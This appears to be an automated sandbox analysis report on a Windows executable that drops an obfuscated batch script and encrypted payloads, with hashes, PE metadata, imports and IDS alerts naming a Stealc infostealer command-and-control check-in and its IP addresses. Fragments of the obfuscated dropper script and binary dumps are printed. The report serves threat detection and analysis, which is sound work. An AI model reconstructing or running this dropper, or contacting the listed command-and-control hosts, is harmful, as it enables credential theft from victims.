Preview:	...............+.#b........u.~.....k^=...Y..{k-s..\|..5du-1.DF1...(.G...H....b....i... k.Rq.V.j.>.. .....E...?J..n..\|.h .......k"....3.b....v:..be.6]$K.<.[zqF....._..}R....4.a.....>F..G.M.-...#7...Y.!......[...%..9.....l..xM............t.nO3.+....5..}.wx^....S...M.5{3.]...b/e.R..n.=t\|{!p...^.U,+.3@.....Q..W&.D...#.8Gwq..'5.......u....p[H.[.x.p.$^....\U.Q..5iD.P\..NL....9...+.5v.2...=...6..S.2...Y$....3.n...n.&...}....}5..]...>j......'.c.R...-...h..f..&..7..Y.,......`8=D...a.'24.+^e....Fk...'..&I.n...?.*g.....]L.$.aSe.#...f,?...Z.{..........6w.A....."W....C.n......\R..}..AND..j...,..H.....:~......,8...p...)@.j.f.Px.....-C.T.....X...3.6N.K...eu".U9..,....A.........D{l....O..6.gmf.;..W.M....9........u.j+e.y..g(....3..'=w.C......-....!..P...a.<.~g..RVo.....".&..C..;..$[V...m1 .\|.....".3.I....w.e..s)....z...n.'5...%.....I.W..V"..0...]...P....j..p.......SZ..o..gx.+Y._..pDS..${gxX..7.....wKB X.j.8........$.o..B.Z..3T.v.&?l N..7~......

C:\Users\user\AppData\Local\Temp\Halo

Download File

Process:	C:\Users\user\Desktop\M13W1o3scc.exe
File Type:	ASCII text, with very long lines (806), with CRLF line terminators
Category:	dropped
Size (bytes):	19476
Entropy (8bit):	5.0831022046182
Encrypted:	false
SSDEEP:	384:N3OLrtdsmuC5hREsUrjXSjv1oE6dhBo72NCFMsNKkkGz:N3wrtDuC5hREjrDSj124FKSz
MD5:	57B804853E07DA1EBC6A9C420E68F0E1
SHA1:	B31F21A3B924F017DDF6A6849AD17439B0B929C7
SHA-256:	E8D929F7CFB4DE6AA4097E1240BE42EB3576D043E9A3D685CB7596B2B9F2B8E8
SHA-512:	AC5334E1BC05464FBBA6ECC9C9E631EA7705DB14BA0625EF4E161C6C59F8C9601B9F2EE08C407AD12A03A9E5A8DED2D7B13DC5988E020E57B03BF7B0C471040C
Malicious:	false
Preview:	Set Baptist=f..ljFwd-Lead-Strike-..RcVwColleges-..VsReduce-Ns-Attachments-..jZbPackard-Ferrari-Guarantee-Finally-Solved-..rhWiPreviews-Thousands-Loving-Camp-Thinkpad-Semiconductor-Xanax-..KUgVDensity-Remains-Aberdeen-Periodic-Maiden-S-Vista-Dicks-Rolling-..TAfmCharts-Welsh-Secret-Describes-Titanium-Consequently-..slnPractitioner-Diesel-..Set Allowing=8..qYejLolita-Options-..HYPMerchandise-Originally-Native-Flexible-Troy-Wma-Health-..lyForget-Favourites-Situated-Crap-Manchester-Ge-Investment-Tapes-Fall-..tUENTrusts-Manuals-Told-..iAPerceived-Share-Nhl-Training-..UYtRiver-Thus-Acknowledge-Positions-Threesome-Functional-Erik-Bedford-..ptStretch-Jill-Reads-Adapted-Naturally-..rTlVote-Incurred-Transexuales-Pounds-Adelaide-Oecd-Opposed-Swap-Moss-..jedqBars-Gabriel-Memo-Days-Skype-Constitution-..vYPdTips-Track-Dear-Tracy-Cuisine-Optimize-Strategies-Updated-..Set Divx=M..okPaBehavior-Drops-Damage-Ones-Stand-Per-..CpXTSpeaks-Movement-..aBCleaning-Whom-Config-Boobs-Review-Validation-Injury-Rc-..

C:\Users\user\AppData\Local\Temp\Halo.bat (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (806), with CRLF line terminators
Category:	dropped
Size (bytes):	19476
Entropy (8bit):	5.0831022046182
Encrypted:	false
SSDEEP:	384:N3OLrtdsmuC5hREsUrjXSjv1oE6dhBo72NCFMsNKkkGz:N3wrtDuC5hREjrDSj124FKSz
MD5:	57B804853E07DA1EBC6A9C420E68F0E1
SHA1:	B31F21A3B924F017DDF6A6849AD17439B0B929C7
SHA-256:	E8D929F7CFB4DE6AA4097E1240BE42EB3576D043E9A3D685CB7596B2B9F2B8E8
SHA-512:	AC5334E1BC05464FBBA6ECC9C9E631EA7705DB14BA0625EF4E161C6C59F8C9601B9F2EE08C407AD12A03A9E5A8DED2D7B13DC5988E020E57B03BF7B0C471040C
Malicious:	false
Preview:	Set Baptist=f..ljFwd-Lead-Strike-..RcVwColleges-..VsReduce-Ns-Attachments-..jZbPackard-Ferrari-Guarantee-Finally-Solved-..rhWiPreviews-Thousands-Loving-Camp-Thinkpad-Semiconductor-Xanax-..KUgVDensity-Remains-Aberdeen-Periodic-Maiden-S-Vista-Dicks-Rolling-..TAfmCharts-Welsh-Secret-Describes-Titanium-Consequently-..slnPractitioner-Diesel-..Set Allowing=8..qYejLolita-Options-..HYPMerchandise-Originally-Native-Flexible-Troy-Wma-Health-..lyForget-Favourites-Situated-Crap-Manchester-Ge-Investment-Tapes-Fall-..tUENTrusts-Manuals-Told-..iAPerceived-Share-Nhl-Training-..UYtRiver-Thus-Acknowledge-Positions-Threesome-Functional-Erik-Bedford-..ptStretch-Jill-Reads-Adapted-Naturally-..rTlVote-Incurred-Transexuales-Pounds-Adelaide-Oecd-Opposed-Swap-Moss-..jedqBars-Gabriel-Memo-Days-Skype-Constitution-..vYPdTips-Track-Dear-Tracy-Cuisine-Optimize-Strategies-Updated-..Set Divx=M..okPaBehavior-Drops-Damage-Ones-Stand-Per-..CpXTSpeaks-Movement-..aBCleaning-Whom-Config-Boobs-Review-Validation-Injury-Rc-..

C:\Users\user\AppData\Local\Temp\Mobility

Download File

Process:	C:\Users\user\Desktop\M13W1o3scc.exe
File Type:	data
Category:	dropped
Size (bytes):	66560
Entropy (8bit):	7.9968828442647935
Encrypted:	true
SSDEEP:	1536:oIffQ/PhTcjSJyesa1ZI2enVl27nORe60:1frZs1ZHI2KQV
MD5:	1FA7E13726678638DDBA735F37332B66
SHA1:	8B34D68C5B3BAE34B8EEF149F91D074D1EF4EE90
SHA-256:	0459D7D231B4AFF6939621532F27E5E771BA602D766527FBF9C90FFB3B701AA7
SHA-512:	B32881238E8BBCE2A8722F308EA01220178F598CB3DFD40BA335FD9C8090E75468DF6694DD736CDF3EA4A6142B9A539C5CF940D373B7D4039BE86065E3B8A503
Malicious:	false
Preview:	.!..h.r..Uy.x.rg.....U..m......T.8...xt......t\..K.v..a.u...A.e..6.9J..W9.~...u....o'...y..%yF.g(.=.,.YH. k,...=..Lp.~i%u?...sV$.....>Lq......_.G.........N..Lv..c&.eE?. ..mo..."...o.CV....{`....[v.._.qmC....].....d..g.w./..p~.e.P.j.7....S`..fd4..R....,.v-..gV..>....n}U?....i....H..m$.8Y[...X.p.XO..3I..J...a~.\@.G'.Z.U..PM.fA.GG..........^K..N..kbf.Q'.;I`..(rV.............eB.......#k...."dh....!s.]..5C.q:.X...d.V.g..:.....<.6...+L...'..<...Q7{..........NUg....0..`.=.F..#I.H.4.M....._...s.......6.....7h.x.:......o'$.K..1./.l...d{Py).....s...B.M...G.....<..5...noR._.(.l.H\..f)4AG..i.w...%......,...".m.eW.=.%...o....M=...bi\|....E...H>.t(.$b..}b.....'.S..G.....x.c....,.O...K.zh@.\...C2.2..."2...."".y......rJ.......j.}!.Hl.%........2.NmuCa.+OIR.......>.q.}......\|.\.s.....;..........g..7."......Y5z....x>.B&..........~L...8.6..=....X....#p....f......aO_...M.b-e.6\|ns`4.M...j.8.b>'.....(a"%..........+zq.n....3.^..b]%\..p.....FEZ'3&.......

C:\Users\user\AppData\Local\Temp\Partition

Download File

Process:	C:\Users\user\Desktop\M13W1o3scc.exe
File Type:	data
Category:	dropped
Size (bytes):	6964
Entropy (8bit):	6.198881342149232
Encrypted:	false
SSDEEP:	192:DHAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMlb1:DHAHhww+/2nlP3r1WA5
MD5:	90A36351590FE11ED46C3D5871AE07F7
SHA1:	43AD4BB6321BCAD808DD39A2F7137BB9649E360C
SHA-256:	07994A4A252E77CEA5147B40FDB8504E559CD6E5196777803E91D4337F511C8C
SHA-512:	331B66DD11DB597F52EA1EBEEEAA47D776070FBB5D2C923F6BEE7BEAFEAAF9D5D98D04AD7D0CB9602D9B11324B347B4F8FBC836D358E2D3A31B57FD460AB7144
Malicious:	false
Preview:	MineralAlertSignificantVanilla..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Reference

Download File

Process:	C:\Users\user\Desktop\M13W1o3scc.exe
File Type:	data
Category:	dropped
Size (bytes):	886676
Entropy (8bit):	6.622117362337388
Encrypted:	false
SSDEEP:	12288:8V0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:Gxz1JMyyzlohMf1tN70aw8501
MD5:	C508E3085AE5BB8C9ED62A944D5982E1
SHA1:	70372374A97BE905EE23DFF8DB8D84A4E1FAF2B9
SHA-256:	6ED342E3C416B923A1339D9D5000B08DADC025C7AA9FD7396D2BED961C8FD5CB
SHA-512:	9889D417BE7F7CE0DA15890677CFF00018926379E376E26AC8B0A49269E121EF905AC2F92D7BA8C72C9FE58D24D9BA12C8FFBE77640B83C1E533AC80C46BF770
Malicious:	false
Preview:	U..QQSVW.}..E.P..7....I..E...l....E...p....E.PV..p.I..M..E.;.t...uc;.x...u[.s..5..I....s........E.......E....;.\|.....a....}..t...\|...;............}..t......._^[..]....}....t.....x...\|......U...M.VW...........\|P;......H.Bt.......t<.u..@....M.....B`....8.t".....\|.;........Bt....8.t..._^]...2...U..V..W.}.;............Ft.......t.Q.?....Ft.... .......;.....u?...\|..Ft......8.u.O......}..........Nx.Nx.Ft.4......FtY.Nx.$...~x.v..Nx.Ft.D...8.t._^]..................j...U..Q..(xL.VW9.0xL.un.=4xL...........h.........Y..................E..}.P. xL......54xL.F.54xL...$xL.....0xL.....9.M..I..O._^..]...j.^3.;.~...$xL....98u#h.....[...Y..t..............3..F;.\|...U..V.u.W....t$j.V..\.I.;Gxs..Ot.......t.91u._^]........U..V.u.W....t$j.V..\.I.;Gds..O`.......t.91u._^]........U..QS3....wL.....V3....wL.@...wL.W.....wL...wL...wL....wL...wL....wL....wL..=.wL....wL....wL....wL....wL.....j.^j\|Xf..wL.3....xL.h.I....xL....xL....xL..=.xL... xL.l.I...$xL...(xL...,xL..50xL...4xL.......8xL...<xL...@xL..=DxL..

C:\Users\user\AppData\Local\Temp\Transmit

Download File

Process:	C:\Users\user\Desktop\M13W1o3scc.exe
File Type:	data
Category:	dropped
Size (bytes):	67584
Entropy (8bit):	7.997058551880498
Encrypted:	true
SSDEEP:	1536:a02qeLeqYyxO2M1WFpMG0QrZkcR88X6GWxrx8V1Eo07ye0q6fOlC+:Z2/9xwWFp90Qruce8hWxriVmo0796fCr
MD5:	C04A12FE1745C5DB83A1DC95A0EE5084
SHA1:	6AA64B9E62DED24CA0E94A26994EE913C29D15CA
SHA-256:	6F85E4E44863D0481A3551AE3BBF235AD3869EAEDF403B9EC2F5AE03E29F351D
SHA-512:	864690E526D5307E7EBCB68D4D52025150B8B6E4687B748706EF3434D09007AB18A06096DD6EFF1606232E7A102644E3DB1265A0D792FCBF97E8AA0C81D84064
Malicious:	false
Preview:	..{.....@.....FPh......&.o.\'.4..n..........5..L..@w...R...?.zk...j.E.v..q....fv}.Y}C.QZc..e.2..6....d.dn..:...@'.Hv..I....&pm.Rvo.%...{..e.....>.....?.a......=...6/..r....,./..."..R....e...z......sA..bX5H..X?3......d~+...)..,..sy2...=.=O..z..... .Y.q].3..H<.OE......\.`&......T.+........p.e@.........B.....`Z.g..m...7.#.%.Y8..ob'p$X".~..<................yi.'..3#B...b..."\......G..h.'..R.t..\|&.s....I....R)...2....._..j6]..D.5..J..QOzO..NV.A.....H.M\|.'...m3.\.7.YR.b..L..y...+2...c.k!)..n...9.<J..............y:)0t.;.8(..o.......s......{.\|..k......H.....Z.n...?..)..?...BW.W;.~....b...K"......c......:...N.>.....m.14F...Q..\h....7]..'.4:..}....`...F.2....]a.FP.Q"E........I.b.(.b..S}.>......7\|."......&.Yd.S.....\.C.......!i.c......Bp,f/.[..gpMS ........Q..]C.A.....i.ni-.D;>d...X....J'...p?\|.....9...d..4]Y..".v.Z..J.l.;...,........q...S..Me.,.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jx

C:\Users\user\AppData\Local\Temp\Turtle

Download File

Process:	C:\Users\user\Desktop\M13W1o3scc.exe
File Type:	data
Category:	dropped
Size (bytes):	99328
Entropy (8bit):	7.998400549500089
Encrypted:	true
SSDEEP:	1536:MCyIIUkVfM1cWWkj0tbiU/F1PkS9juSZuWF0DjNC+6EAMPMi+R8kf+eooGGy:ByIJWrWbuZ/FBru4uWk4IIZGeobT
MD5:	12F0E0FEEDA74A75CE2D87246A76D65C
SHA1:	215C858D9192E8E3CB57E229349FF444C9E438B7
SHA-256:	8B178B94D092EC1EF2C284FC98B1E90D3D314EB7938CCC9BF6E268B40ACF7E8D
SHA-512:	6BB028C66E46A09D1F182F6620C248A469DF9B977F2835C25286B4CE1D29A58AF13F35191695A23DDFF362483D992267473BDA1C8F951FB9D45B00C80DA2F14E
Malicious:	false
Preview:	70F.x^.\7.0s...Jc..)hych.y..uw....i&W..m.4.P..H.v.x....t...\|.q!s.b_...W8udIh.+.:.....`.J..e.. ......c.Y\|hgQL..}>v!..W..yo....9._._)..rz...l..cUBm{)W.;Og..};....."..{..64Y..:....I.\'.;.1"....u-...`&.^-.+Q....7j(.AUv...V^........V..'1bRN...m..<cw.2..k.Q..a>..ix.\|...iu...M.C......Y....).G5. .?.=(.... n+......j.\..!..P..2.8.. ....6.>"c.....Q.E......b^U57...{q.o...w....y.].k\|p......s....t+lz7.iu...i....%~[...p.J.+1s../...d~.3;..m....'4..q\|.>...c`k.vE+....w.C....c..PH...A.....b...2.'T1.e.....v....q..>...Fv%\|s3.).S...%...0....."...!..v..].s1.3........].O...i2.y.....,...%N0...i.\.....H.....i....g).H..]l{..s.$.....w.?8.................<.......<2..9e.j.!.h..m.....\|l+f....Wq..s.A'.....z..X....h.h............-.r\|L/.l.m......S.m.3...Et..!^.......G..2y.S......D..R_,.......A.O<.AH...%.!...].:..X.F..("......VS..Q9C..g.A.rU_.fa.....KJ...[.%..s .?..z........O-...X'k..e.5.S}....5M(0:.>.&.....x.cp.....Ob.tI.!..........."..b......q.N..^d?"na0....6.i.w.Kr.9.

C:\Users\user\AppData\Local\Temp\Vienna

Download File

Process:	C:\Users\user\Desktop\M13W1o3scc.exe
File Type:	data
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	7.997566931504384
Encrypted:	true
SSDEEP:	1536:KtqrhGMmj9ZnL6wSqwlkJBIjuVTbADN0xFxRj1zHkr/Wpb3OSvaTDru:KShGMmj9MdrkJeyJb+N0xFPj1zzgSvaS
MD5:	876A87F075D91AD8BA48E3DB1AFFDE91
SHA1:	426142730D47E7D57811CDC0932BE4ADBFBC87C2
SHA-256:	F0C9A098A0ACEAF86CD184F115C7941EC091A6BA1754AFA6CC9CDDF00DDC1B74
SHA-512:	B574BF31BD2AA2B4604C76C659DEAB1DD51E41C103733FCEC77747FA30F6B2DFBC56A9AEE02A9DC569E2763B620FE1640310DD1B40BB4DD76D4EE968D30962A7
Malicious:	false
Preview:	...H'.=..U..)a..Hd.....}..#...... .5.F.O.E.jA..D.F.I.h.5w{.>z .CYy"../.Dt)$........`..8k.l.)..P..A.A...L.....^t.PHF..[..4D.....0.....0.."..Dnw.df...:.. .....N.p.e..9.H...-P.97...B.....6./......."U7x9?...[....fe.I..,Y>....m..._.7G..l@..X....k.O.0.\n2.......Md......f......:I9v..%+N.......W/HBO.G...6..p'...+...<2.,\..d....Zj...?.......tf)?....(..r...\.......1.m....3o....GX.o&_..ol..................g..M..?..)....Y/..".Q=J..y(lM.&...h>.=....fcSt..$._.N...9M...C.LX.(r.W.....#.N..T.....pg.n..C]Y.g.q..!...@..i......ek.(......7..S..E...Y.h...A.p.O........r..............w.4.sb..w.zp.H.tW.JXv..m<...d.;0M....T:.....2a.``..[&......>.w.....g....m..(xEa$4g...T..m.9g.{.. 9O6;..t..:.Dd.%...."..}(...%.Z....2.).0.....s...j..n.....s^..P....^.O..-..b.v.r.E'3S.#.k\1..)..s..F.)......M.8i@xy6.P..8l....t..j..f9.<E.j(.B.~=...m..bX......D...".\_...+.7..W.2......"...E..@A.M-.......WW#...&...D..F."..f{.XC..3.R.P......F.....@...G...#AP.....4....`w......{....c.B.Z+...

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465433242332591
Encrypted:	false
SSDEEP:	6144:AIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNZdwBCswSbW:FXD94+WlLZMM6YFHT+W
MD5:	D1C171F4AC9A3A5CA808CD2B1EA5DF67
SHA1:	FEA95658C093831F610A09BDC98FB0525760B96E
SHA-256:	A4C20233CC50D1D3814138CE6F158D321CFD5E8B8CC37F9AED216E7B84F0E2B0
SHA-512:	2C78C9927F197ADB81E73934B77DD4821FA5C46BD146A1323F48F7EAC20AD5D4E424063808BD7A4F982A5CA146F23A299C358EDC1271930D909C7FB3F1DFC52D
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.RM.$...............................................................................................................................................................................................................................................................................................................................................0.Z.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.9466083373177305
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	M13W1o3scc.exe
File size:	1'210'490 bytes
MD5:	e6dd6a25125edd4c21fe5cf7bafcd2bb
SHA1:	c1b1ec6b5e78fcaff4290bff55ae86ee8816f715
SHA256:	523cd90154c376b7f6953f1e825eb467b231b3fffe30ab321c1a69da22cb1148
SHA512:	3582e09a22e66629917968baee1f77ce6e8c5fa762c7299c2cea4b366ce75874215a3363b94cadf977b2cb1f2c4eea174d82277d7e48f49900eb43469bb13080
SSDEEP:	24576:5ACy4Y4Q1jqxeColSZkrmiZM/z+KpN/6xwA1u3l5y98IOyxa/VvEW:iF7NeY34+iNyxwg2vy9DOyWj
TLSH:	BF452332D6D452FFC87089B9227B14625FEA743CC864C657E3C4E39DB431EA0A50A76B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....

File Icon


Icon Hash:	86c7c30b8fce8d9a

Static PE Info

General

Entrypoint:	0x403883
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 00409268h
mov dword ptr [esp+14h], ebp
call dword ptr [00408030h]
push 00008001h
call dword ptr [004080B4h]
push ebp
call dword ptr [004082C0h]
push 00000008h
mov dword ptr [00472EB8h], eax
call 00007F2F6CEE996Bh
push ebp
push 000002B4h
mov dword ptr [00472DD0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 00409264h
call dword ptr [00408184h]
push 0040924Ch
push 0046ADC0h
call 00007F2F6CEE964Dh
call dword ptr [004080B0h]
push eax
mov edi, 004C30A0h
push edi
call 00007F2F6CEE963Bh
push ebp
call dword ptr [00408134h]
cmp word ptr [004C30A0h], 0022h
mov dword ptr [00472DD8h], eax
mov eax, edi
jne 00007F2F6CEE6F3Ah
push 00000022h
pop esi
mov eax, 004C30A2h
push esi
push eax
call 00007F2F6CEE9311h
push eax
call dword ptr [00408260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F2F6CEE6FC3h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F2F6CEE6F3Ah
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b34	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf4000	0x16cf0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7a000	0x964	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6dae	0x6e00	00499a6f70259150109c809d6aa0e6ed	False	0.6611150568181818	data	6.508529563136936	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x2a62	0x2c00	07990aaa54c3bc638bb87a87f3fb13e3	False	0.3526278409090909	data	4.390535020989255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x67ebc	0x200	014871d9a00f0e0c8c2a7cd25606c453	False	0.203125	data	1.4308602597540492	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x73000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xf4000	0x16cf0	0x16e00	cefdbec47b2f259239c02e016331b460	False	0.6331220116120219	data	6.6037454388882235	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10b000	0xf32	0x1000	b877ad3fcbc482e4e9739ba0f05b6890	False	0.73583984375	data	6.32459166359263	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xf41f0	0x11028	Device independent bitmap graphic, 128 x 256 x 32, image size 69632	English	United States	0.6071018486623033
RT_ICON	0x105218	0x4428	Device independent bitmap graphic, 64 x 128 x 32, image size 17408	English	United States	0.7300550206327373
RT_ICON	0x109640	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	United States	0.8046448087431693
RT_DIALOG	0x10a768	0x100	data	English	United States	0.5234375
RT_DIALOG	0x10a868	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x10a988	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x10a9e8	0x30	data	English	United States	0.8541666666666666
RT_MANIFEST	0x10aa18	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-08T03:52:43.269522+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	60060	172.67.179.207	443	TCP
2024-10-08T03:52:44.114430+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	60061	176.113.115.37	80	TCP
2024-10-08T03:52:47.570397+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	60062	62.204.41.150	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 03:52:42.362044096 CEST	60060	443	192.168.2.4	172.67.179.207
Oct 8, 2024 03:52:42.362117052 CEST	443	60060	172.67.179.207	192.168.2.4
Oct 8, 2024 03:52:42.362200022 CEST	60060	443	192.168.2.4	172.67.179.207
Oct 8, 2024 03:52:42.383356094 CEST	60060	443	192.168.2.4	172.67.179.207
Oct 8, 2024 03:52:42.383443117 CEST	443	60060	172.67.179.207	192.168.2.4
Oct 8, 2024 03:52:42.884417057 CEST	443	60060	172.67.179.207	192.168.2.4
Oct 8, 2024 03:52:42.884485960 CEST	60060	443	192.168.2.4	172.67.179.207
Oct 8, 2024 03:52:42.934309959 CEST	60060	443	192.168.2.4	172.67.179.207
Oct 8, 2024 03:52:42.934328079 CEST	443	60060	172.67.179.207	192.168.2.4
